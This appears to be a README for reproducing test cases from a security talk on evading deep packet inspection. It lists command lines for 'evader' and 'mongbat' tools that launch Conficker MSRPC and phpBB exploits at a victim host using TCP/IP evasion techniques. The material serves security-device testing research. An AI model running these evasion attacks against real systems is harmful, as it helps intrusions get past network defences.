Instructions for repeating the evasion test cases used in the presentation "Evading Deep Inspection for Fun and Shell".
Note that you will need a vulnerable victim host for both exploits.


Baseline tests with obfuscated exploit and no evasions:
	./evader --attack=conficker --if=<eth_iface> --src_ip=<src_ip> --dst_ip=<windows_dst_ip> --obfuscate
	./evader --attack=http_phpbb_highlight --if=<eth_iface> --src_ip=<src_ip> --dst_ip=<phpbb_dst_ip> --obfuscate

Evasion tests with Mongbat:
	Base mongbat command with network configuration is as follows:
		ruby mongbat.rb --mode=random --workers=16 --time=60 --stop_on_success --iface=<eth_iface> --attacker=<src_ip>

	Parameters for MSRPC exploit without stages
		--attack=conficker --victim=<windows_dst_ip> --use_stages=false
	Parameters for MSRPC exploit with stages
		 --attack=conficker --victim=<windows_dst_ip> --use_stages=true
	Parameters for HTTP exploit
		--attack=http_phpbb_highlight --victim=<phpbb_dst_ip>

	Parameters for test cases:
		1:	--use_evasions=tcp_paws
		2:	--use_evasions=tcp_synretranswithpayload
		3:	--use_evasions=ipv4_opt
		4:	--use_evasions=tcp_urgent
		5:	--use_evasions=tcp_recv_window
		6:	--use_evasions=tcp_seg,tcp_order --min_evasions=2
		7:	--use_evasions=tcp_seg,tcp_order,tcp_paws --min_evasions=3
		8:	--use_evasions=tcp_seg,tcp_order,tcp_synretranswithpayload --min_evasions=3
		9:	--use_evasions=tcp_seg,tcp_order,ipv4_opt --min_evasions=3
		10:	--use_evasions=tcp_seg,tcp_order,tcp_urgent --min_evasions=3
		11:	--use_evasions=tcp_seg,tcp_order,tcp_recv_window --min_evasions=3
		12:	--use_evasions=tcp_seg,tcp_order,tcp_recv_window,tcp_paws,tcp_synretranswithpayload,ipv4_opt,tcp_urgent

	Example command line for HTTP exploit and test case 6:
		ruby mongbat.rb --mode=random --workers=16 --time=60 --stop_on_success --iface=eth0 --attacker=10.1.1.10 --attack=http_phpbb_highlight --victim=10.1.1.200 --use_evasions=tcp_seg,tcp_order --min_evasions=2

	Note that when Mongbat is executing it will draw a '.' for each attack that was executed and blocked, 'C' for a clean check fail and a longer Evader output for a successful attack.
	When a run results in 'C' the run is stopped before actually running an exploit as the victim host is determined to be down. If all attacks result in 'C' either the victim host is down 
	or the tested security device is blocking also normal traffic. If the security device is blocking normal traffic and it still needs to be tested, the victim check must be disabled by adding
	--check_victim=false to the Mongbat command line.
		
